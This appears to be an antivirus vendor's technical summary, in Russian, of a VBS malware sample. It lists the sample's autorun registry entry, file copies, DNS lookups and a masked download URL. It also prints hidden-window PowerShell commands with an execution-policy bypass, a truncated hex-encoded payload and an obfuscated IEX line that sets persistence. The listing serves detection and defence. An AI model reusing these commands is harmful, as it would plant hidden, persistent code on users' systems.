Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '' = '%LOCALAPPDATA%\Microsoft\<Имя файла>.vbs'
- %LOCALAPPDATA%\microsoft\<Имя файла>.vbs
- http://pl##tt.com/remittance/edi.jpg
- DNS ASK google.com
- DNS ASK pl##tt.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $VQCvOjEMVdPvCRSGaAmb='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $g='%LOCALAPPDATA%\Microsoft\<Имя файла>.vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft\" /Y' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass $VQCvOjEMVdPvCRSGaAmb='24 54 62 6F 6E 65 3D 27 2A 45 58 27 2E 72 65 70 6C 61 63 65 28 27 2A 27 2C 27 49 27 29 3B 73 61 6C 20 4D 20 24 54 62 6F 6E 65 3B 64 6F 20 7B 24 70...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $g='%LOCALAPPDATA%\Microsoft\<Имя файла>.vbs';'Set-Item -Path HKCU:\Software\Micro@@oft\Window@@\CurrentVer@@ion\Run -Value $g'.replace('@@','s') |I`E`X
- '<SYSTEM32>\cmd.exe' /c copy "<PATH_SAMPLE>.vbs" "%LOCALAPPDATA%\Microsoft\" /Y